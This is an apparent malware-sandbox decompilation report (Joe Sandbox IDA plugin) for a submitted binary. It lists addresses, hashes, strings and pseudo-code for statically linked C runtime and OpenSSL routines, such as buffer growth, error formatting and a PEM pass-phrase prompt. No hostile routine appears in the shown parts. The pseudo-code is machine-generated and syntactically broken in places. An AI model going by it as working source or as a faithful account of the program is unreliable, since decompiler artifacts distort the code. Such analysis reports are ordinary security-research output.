0x004576ac
0x004576ad
0x004576ae
0x004576af
0x004576b5
0x004576ba
0x004576be
0x004576c0
0x004576c2
0x004576ca
0x004576cd
0x004576cf
0x004576d3
0x004576d5
0x004576d7
0x004576d7
0x004576d8
0x004576d8
0x004576d7
0x004576e5
0x004576e8
0x004576ed
0x004576f1
0x004576f3
0x004576f5
0x004576f5
0x004576f9
0x004576fa
0x004576fe
0x004576ff
0x00457703
0x00457704
0x00457708
0x00457709
0x0045770d
0x0045770f
0x00457715
0x00457715
0x00457719
0x00000000
0x00000000
0x0045771f
0x00457721
0x00457725
0x00457727
0x00457730
0x00457730
0x00457733
0x00457772
0x00457772
0x00457786
0x0045778b
0x0045778e
0x00457735
0x00457735
0x00457738
0x0045773a
0x0045773a
0x00457751
0x00457753
0x00457756
0x00457758
0x0045775a
0x00457761
0x00457766
0x00457766
0x00457769
0x00457769
0x00457792
0x00457792
0x00457796
0x00457796
0x00457727
0x0045779a
0x0045779c
0x0045779e
0x004577a0
0x004577a3
0x004577a5
0x004577af
0x004577a7
0x004577a7
0x004577a7
0x004577b3
0x004577b3
0x004577b3
0x004577b9
0x004577ba
0x004577bb
0x004577bf
0x004577c3
0x004577c5
0x00000000
0x00000000
0x00000000
0x004577c5
0x00457715
0x004577cb
0x004577cb
0x004577cf
0x004577d1
0x004577d3
0x004577d7
0x004577e0
0x004577e0
0x004577e4
0x00000000
0x00000000
0x004577ee
0x004577f7
0x004577fe
0x004577ff
0x00457803
0x00457806
0x00457808
0x00000000
0x00000000
0x00000000
0x00457808
0x004577e0
0x0045780a
0x0045780a
0x0045780f
0x00457811
0x00457811
0x00457815
0x00000000
0x00000000
0x0045781d
0x00457826
0x00457829
0x0045782a
0x0045782a
0x0045782a
0x0045782e
0x00457832
0x00000000
0x00000000
0x00000000
0x00457832
0x00457811
0x00457834
0x00457839
0x00000000
0x00000000
0x00000000
0x00457518
0x00457518
0x0045751d
0x00457529
0x00457529
0x0045752d
0x00457531
0x00457536
0x00457538
0x00457540
0x00457540
0x00457542
0x00457543
0x00457547
0x00457551
0x00457554
0x00457558
0x0045755f
0x00457565
0x00457568
0x0045756a
0x0045756e
0x00457571
0x00457575
0x0045757b
0x0045757f
0x00457582
0x00457586
0x00457588
0x00457588
0x0045758e
0x00457590
0x00457592
0x00457592
0x00457596
0x00457596
0x0045759c
0x0045759e
0x004575a2
0x004575ab
0x004575b0
0x004575b1
0x004575b4
0x004575b8
0x004575bc
0x004575bc
0x004575c0
0x004575c6
0x004575d3
0x004575d8
0x004575d8
0x004575df
0x004575e3
0x004575e5
0x004575e9
0x004575f0
0x004575f8
0x00457601
0x00457604
0x00457605
0x00457609
0x0045760b
0x0045760f
0x00457613
0x00457613
0x0045761c
0x0045761e
0x00457622
0x00457626
0x0045762c
0x00457635
0x00457638
0x00457639
0x0045763d
0x00457641
0x00457645
0x00457645
0x0045764b
0x0045764d
0x00457651
0x00457651
0x00457656
0x0045765f
0x00457664
0x00457667
0x0045766b
0x0045766b
0x00457671
0x00457673
0x00457675
0x00457681
0x00457686
0x00457689
0x00457689
0x00457675
0x00457690
0x00457691
0x00457693
0x0045769e
0x0045769e

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789abcdef, xrefs: 004574C4
+, xrefs: 00457475
0123456789ABCDEF, xrefs: 004574D6
, xrefs: 00457482

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50
timewindowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B10() {
				intOrPtr _v8;
				struct tagMSG _v36;
				long _t9;
				long _t11;
				intOrPtr _t19;

				_t1 = timeGetTime() + 0x1388; // 0x1388
				_t19 = _t1;
				_v8 = _t19;
				_t9 = timeGetTime();
				if(_t19 > _t9) {
					do {
						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
						if(_t11 == 0) {
							goto L5;
						}
						while(_v36.message != 0x12) {
							DispatchMessageW( &_v36);
							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
							if(_t11 != 0) {
								continue;
							}
							goto L5;
						}
						break;
						L5:
						Sleep(0x64);
						_t11 = timeGetTime();
					} while (_v8 > _t11);
					return _t11;
				}
				return _t9;
			}

0x00411b20
0x00411b20
0x00411b26
0x00411b29
0x00411b2d
0x00411b40
0x00411b4c
0x00411b50
0x00000000
0x00000000
0x00411b52
0x00411b5c
0x00411b6a
0x00411b6e
0x00000000
0x00000000
0x00000000
0x00411b6e
0x00000000
0x00411b70
0x00411b72
0x00411b78
0x00411b7a
0x00000000
0x00411b7f
0x00411b85

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32 ref: 00411B4C
DispatchMessageW.USER32 ref: 00411B5C
PeekMessageW.USER32 ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 9.1, APIs: 6, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v32;
				signed int _t16;
				intOrPtr _t17;
				signed int _t19;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				signed int* _t40;
				void* _t48;
				signed int _t50;
				signed int _t54;
				signed int _t57;
				intOrPtr _t58;
				intOrPtr _t59;

				_t48 = __edx;
				_t40 = _a4;
				_t65 = _t40;
				if(_t40 != 0) {
					 *_t40 =  *_t40 & 0x00000000;
					_t54 = _a12;
					_t50 = _a8;
					__eflags = _t50;
					if(_t50 == 0) {
						__eflags = _t54;
						if(__eflags == 0) {
							goto L4;
						} else {
							goto L13;
						}
					} else {
						__eflags = _t54;
						if(__eflags == 0) {
							L13:
							_t35 = E00425208(__eflags);
							_t58 = 0x16;
							 *_t35 = _t58;
							E004242D2();
							_t17 = _t58;
							goto L10;
						} else {
							L4:
							__eflags = _t50;
							if(_t50 != 0) {
								 *_t50 = 0;
							}
							_t16 = E00441667(_a16);
							_a4 = _t16;
							__eflags = _t16;
							if(_t16 == 0) {
								L15:
								_t17 = 0;
								goto L10;
							} else {
								_t19 = E0042C160(_t16) + 1;
								 *_t40 = _t19;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L15;
								} else {
									__eflags = _t19 - _t54;
									if(_t19 <= _t54) {
										_t20 = E0042C0FD(_t50, _t54, _a4);
										__eflags = _t20;
										if(_t20 != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E004242FD(_t40, _t48);
											asm("int3");
											_push(0xc);
											_push(0x508078);
											E00428520(_t40, _t50, _t54);
											_v32 = _v32 & 0x00000000;
											_t56 = _a4;
											__eflags = _a4;
											__eflags = 0 | _a4 != 0x00000000;
											if(__eflags != 0) {
												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
												asm("sbb eax, eax");
												if(__eflags == 0) {
													goto L17;
												} else {
													E00428AF7(7);
													_t12 =  &_v8;
													 *_t12 = _v8 & 0x00000000;
													__eflags =  *_t12;
													_t57 = E00441667(_t56);
													_v32 = _t57;
													_v8 = 0xfffffffe;
													E004417FD();
													_t30 = _t57;
												}
											} else {
												L17:
												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
												E004242D2();
												_t30 = 0;
											}
											return E00428565(_t30);
										} else {
											goto L15;
										}
									} else {
										_t17 = 0x22;
										L10:
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t37 = E00425208(_t65);
					_t59 = 0x16;
					 *_t37 = _t59;
					E004242D2();
					_t17 = _t59;
					L11:
					return _t17;
				}
			}

0x004416eb
0x004416ef
0x004416f3
0x004416f5
0x0044170a
0x0044170d
0x00441711
0x00441714
0x00441716
0x0044174d
0x0044174f
0x00000000
0x00000000
0x00000000
0x00000000
0x00441718
0x00441718
0x0044171a
0x00441751
0x00441751
0x00441758
0x00441759
0x0044175b
0x00441760
0x00000000
0x0044171c
0x0044171c
0x0044171c
0x0044171e
0x00441720
0x00441720
0x00441726
0x0044172b
0x0044172f
0x00441731
0x00441775
0x00441775
0x00000000
0x00441733
0x00441739
0x0044173a
0x0044173d
0x0044173f
0x00000000
0x00441741
0x00441741
0x00441743
0x00441769
0x00441771
0x00441773
0x0044177b
0x0044177c
0x0044177d
0x0044177e
0x0044177f
0x00441780
0x00441785
0x00441786
0x00441788
0x0044178d
0x00441792
0x00441798
0x0044179b
0x004417a0
0x004417a2
0x004417c6
0x004417c8
0x004417cc
0x00000000
0x004417ce
0x004417d0
0x004417d6
0x004417d6
0x004417d6
0x004417e1
0x004417e3
0x004417e6
0x004417ed
0x004417f2
0x004417f2
0x004417a4
0x004417a4
0x004417a9
0x004417af
0x004417b4
0x004417b4
0x004417f9
0x00000000
0x00000000
0x00000000
0x00441745
0x00441747
0x00441748
0x00000000
0x00441748
0x00441743
0x0044173f
0x00441731
0x0044171a
0x004416f7
0x004416f7
0x004416fe
0x004416ff
0x00441701
0x00441706
0x00441749
0x0044174c
0x0044174c

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
__invoke_watson.LIBCMT ref: 00441780
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr _t43;
				char* _t46;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr* _t57;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				unsigned int _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;

				E0042F7C0(0xd4);
				_t29 =  *0x50ad20; // 0x4ea20c1c
				_a208 = _t29 ^ _t75;
				_t54 = _a224;
				_t68 = _a216;
				_t67 = _a220;
				_t73 = _t68 >> 0x0000000c & 0x00000fff;
				_a8 = _t68 & 0x00000fff;
				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
				_v0 = E00450870(_t54, _t67, _t73, _t68);
				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
				_t76 = _t75 + 0xc;
				_a12 = _t35;
				if(_a4 == 0) {
					_push(_t68 >> 0x18);
					_push("lib(%lu)");
					_push(0x40);
					_push( &_a144);
					E004567A0(_t68 >> 0x18);
					_t76 = _t76 + 0x10;
				}
				_t81 = _v0;
				if(_v0 == 0) {
					_push(_t73);
					_push("func(%lu)");
					_push(0x40);
					_push( &_a80);
					E004567A0(_t81);
					_t76 = _t76 + 0x10;
				}
				_t74 = _a12;
				_t82 = _t74;
				if(_t74 == 0) {
					_push(_a8);
					_push("reason(%lu)");
					_push(0x40);
					_push( &_a16);
					E004567A0(_t82);
					_t76 = _t76 + 0x10;
				}
				_t55 = _v0;
				_t37 =  !=  ? _t74 :  &_a16;
				_push( !=  ? _t74 :  &_a16);
				_t39 =  !=  ? _t55 :  &_a80;
				_push( !=  ? _t55 :  &_a80);
				_t41 =  !=  ? _a4 :  &_a144;
				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
				_t57 = _t67;
				_t77 = _t76 + 0x1c;
				_t66 = _t57 + 1;
				do {
					_t43 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t43 != 0);
				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
					_t69 = 0;
					_t54 = _t54 + _t67;
					do {
						_t46 = E00431C30(_t67, 0x3a);
						_t77 = _t77 + 8;
						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
							_t46 = _t54 - 5 + _t69;
							 *_t46 = 0x3a;
						}
						_t69 = _t69 + 1;
						_t67 = _t46 + 1;
					} while (_t69 < 4);
				}
				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
			}

0x004506a5
0x004506aa
0x004506b1
0x004506b9
0x004506c2
0x004506cc
0x004506de
0x004506e4
0x004506ee
0x004506f8
0x004506fc
0x00450701
0x00450704
0x0045070d
0x0045071b
0x0045071c
0x00450721
0x00450723
0x00450724
0x00450729
0x00450729
0x0045072c
0x00450731
0x00450733
0x00450734
0x0045073d
0x0045073f
0x00450740
0x00450745
0x00450745
0x00450748
0x0045074c
0x0045074e
0x00450750
0x00450758
0x0045075d
0x0045075f
0x00450760
0x00450765
0x00450765
0x00450768
0x00450772
0x00450777
0x0045077c
0x00450783
0x0045078d
0x00450799
0x0045079e
0x004507a0
0x004507a3
0x004507a6
0x004507a6
0x004507a8
0x004507a9
0x004507b4
0x004507bb
0x004507bd
0x004507c0
0x004507c3
0x004507c8
0x004507cd
0x004507db
0x004507dd
0x004507dd
0x004507e0
0x004507e1
0x004507e4
0x004507c0
0x00450801

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

error:%08lX:%s:%s:%s, xrefs: 00450792
reason(%lu), xrefs: 00450758
func(%lu), xrefs: 00450734
lib(%lu), xrefs: 0045071C

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t40;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;

				_t55 = __ebp;
				_t1 =  &_a8; // 0x463967
				_t53 =  *_t1;
				_t2 =  &_a4; // 0x463967
				_t52 =  *_t2;
				_t43 =  *_t52;
				if(_t43 < _t53) {
					__eflags =  *(_t52 + 8) - _t53;
					if( *(_t52 + 8) < _t53) {
						__eflags = _t53 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t44 = _t53 + 3;
							_t50 = 0xaaaaaaab * _t44 >> 0x20;
							_t18 =  *((intOrPtr*)(_t52 + 4));
							_push(__ebx);
							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
							__eflags = _t18;
							if(_t18 != 0) {
								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
							} else {
								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
							}
							_t51 = _t19;
							__eflags = _t51;
							if(__eflags != 0) {
								__eflags = _t53 -  *_t52;
								 *((intOrPtr*)(_t52 + 4)) = _t51;
								 *(_t52 + 8) = _t40;
								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
								 *_t52 = _t53;
								return _t53;
							} else {
								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
						 *_t52 = _t53;
						return _t53;
					}
				} else {
					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
					 *_t52 = _t53;
					return _t53;
				}
			}

0x0045ae30
0x0045ae31
0x0045ae31
0x0045ae36
0x0045ae36
0x0045ae3a
0x0045ae3e
0x0045ae5a
0x0045ae5d
0x0045ae7b
0x0045ae81
0x0045aea0
0x0045aea8
0x0045aeaa
0x0045aead
0x0045aeb2
0x0045aeb5
0x0045aeb7
0x0045aedd
0x0045aeb9
0x0045aec4
0x0045aec9
0x0045aee5
0x0045aee7
0x0045aee9
0x0045af0f
0x0045af11
0x0045af1a
0x0045af1e
0x0045af26
0x0045af2d
0x0045aeeb
0x0045aefb
0x0045af03
0x0045af0a
0x0045af0a
0x0045ae83
0x0045ae93
0x0045ae9b
0x0045ae9f
0x0045ae9f
0x0045ae5f
0x0045ae67
0x0045ae6c
0x0045ae74
0x0045ae7a
0x0045ae7a
0x0045ae40
0x0045ae4b
0x0045ae53
0x0045ae59
0x0045ae59

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D
.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E0043749C(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E004374F1(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004242FD(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x50ad20; // 0x4ea20c1c
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00425A97(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}

0x00425348
0x0042534e
0x00425359
0x00425360
0x0042536d
0x0042536f
0x00425374
0x00425379
0x0042537f
0x00425388
0x0042538d
0x00425392
0x0042539a
0x0042539b
0x0042539c
0x0042539d
0x0042539e
0x0042539f
0x004253a4
0x004253a8
0x004255d8
0x004255d9
0x004255e1
0x004255e8
0x004255eb
0x004255ef
0x004255f5
0x00425620
0x00425626
0x00425630
0x00425639
0x00425394
0x00425394
0x00000000
0x00425394
0x0042537b
0x0042537b
0x00000000
0x0042537b
0x00425362
0x00425362
0x0042537c
0x0042537e
0x0042537e
0x0042534a
0x0042534d
0x0042534d

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				signed int _t11;
				signed int _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t36;
				void* _t40;
				void* _t41;

				_t28 = _a16;
				if(_t28 == 0) {
					_t10 = E0047D440();
					_t38 = _a12;
					__eflags = _t10;
					_t24 = _a8;
					_t33 = _a4;
					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
					_t41 = _t40 + 0x14;
					__eflags = _t11;
					if(__eflags != 0) {
						L9:
						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
						__eflags = _t14;
					} else {
						do {
							_t15 = _t33;
							_t28 = _t15 + 1;
							do {
								_t26 =  *_t15;
								_t15 = _t15 + 1;
								__eflags = _t26;
							} while (_t26 != 0);
							_t14 = _t15 - _t28;
							__eflags = _t14 - 4;
							if(__eflags < 0) {
								goto L8;
							}
							goto L10;
							L8:
							_push(4);
							_push("phrase is too short, needs to be at least %d chars\n");
							_t16 = E00420E4D();
							E00422408(_t24, _t31, _t33, __eflags);
							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
							_t41 = _t41 + 0x20;
							__eflags = _t19;
						} while (__eflags == 0);
						goto L9;
					}
					L10:
					return _t14;
				} else {
					_t34 = _t28;
					_t27 = _t34 + 1;
					do {
						_t20 =  *_t34;
						_t34 = _t34 + 1;
					} while (_t20 != 0);
					_t36 =  >  ? _a8 : _t34 - _t27;
					E0042D8D0(_a4, _t28, _t36);
					return _t36;
				}
			}

0x00462ff0
0x00462ff7
0x00463027
0x0046302c
0x00463030
0x00463032
0x0046303b
0x0046303f
0x00463048
0x0046304d
0x00463050
0x00463052
0x00463095
0x004630a2
0x004630b3
0x004630b3
0x00463054
0x00463054
0x00463054
0x00463056
0x00463060
0x00463060
0x00463062
0x00463063
0x00463063
0x00463067
0x00463069
0x0046306c
0x00000000
0x00000000
0x00000000
0x0046306e
0x0046306e
0x00463070
0x00463075
0x0046307e
0x00463089
0x0046308e
0x00463091
0x00463091
0x00000000
0x00463054
0x004630b6
0x004630ba
0x00462ff9
0x00462ff9
0x00462ffb
0x00463000
0x00463000
0x00463002
0x00463003
0x0046300d
0x00463018
0x00463023
0x00463023

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

phrase is too short, needs to be at least %d chars, xrefs: 00463070
.\crypto\pem\pem_lib.c, xrefs: 00463097
Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
